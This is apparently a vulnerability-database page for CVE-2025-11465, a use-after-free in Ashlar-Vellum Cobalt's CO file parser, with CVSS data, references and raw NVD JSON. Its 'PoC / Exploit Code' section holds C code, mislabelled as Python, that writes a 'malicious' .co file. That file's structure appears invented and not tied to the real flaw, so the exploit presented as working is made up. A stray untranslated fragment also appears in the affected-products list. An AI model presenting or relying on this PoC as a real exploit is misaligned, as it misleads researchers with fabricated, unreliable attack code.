CVE-2025-11465

Description

Ashlar-Vellum Cobalt CO File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CO files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26631.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ashlar:cobalt:12.2.1204.97:*:*:*:*:*:*:* - VULNERABLE

Ashlar-Vellum Cobalt < 最新版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-11465 PoC - Use-After-Free in Ashlar-Vellum Cobalt CO File Parser
// This PoC creates a malicious CO file that triggers the UAF vulnerability

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// CO File Header Structure
typedef struct {
    char magic[4];      // CO file magic number
    int version;
    int header_size;
    int object_count;
} COHeader;

// Malicious object that triggers UAF
unsigned char malicious_co_file[] = {
    // CO file header
    'C', 'O', 'F', 'M',  // Magic: COFM
    0x01, 0x00, 0x00, 0x00,  // Version
    0x40, 0x00, 0x00, 0x00,  // Header size
    0x02, 0x00, 0x00, 0x00,  // Object count
    
    // Object 1: Normal object (will be freed)
    0x01, 0x00, 0x00, 0x00,  // Object type
    0x20, 0x00, 0x00, 0x00,  // Object size
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    
    // Object 2: Trigger object (causes free of Object 1)
    0x02, 0x00, 0x00, 0x00,  // Object type (trigger type)
    0x20, 0x00, 0x00, 0x00,  // Object size
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    
    // UAF trigger: Reference to freed object
    0xFF, 0xFF, 0xFF, 0xFF,  // Invalid pointer/reference
    
    // Padding to reach file size
    0x00, 0x00, 0x00, 0x00
};

void generate_poc_file(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (fp) {
        fwrite(malicious_co_file, 1, sizeof(malicious_co_file), fp);
        fclose(fp);
        printf("[+] PoC file generated: %s\n", filename);
    }
}

int main() {
    printf("CVE-2025-11465 PoC Generator\n");
    printf("Ashlar-Vellum Cobalt CO File UAF RCE\n\n");
    
    generate_poc_file("CVE-2025-11465_malicious.co");
    
    printf("\n[!] Usage: Open the generated .co file with Ashlar-Vellum Cobalt\n");
    printf("[!] This will trigger the Use-After-Free vulnerability\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11465
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11465
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11465/
[4] VulDB https://vuldb.com/cve/CVE-2025-11465
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-956/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11465", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:36.317", "lastModified": "2025-11-04T21:28:10.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ashlar-Vellum Cobalt CO File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ashlar-Vellum Cobalt. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CO files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-26631."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:cobalt:12.2.1204.97:*:*:*:*:*:*:*", "matchCriteriaId": "C0A7B7EF-4D31-41A6-839C-600D91647F69"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-956/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}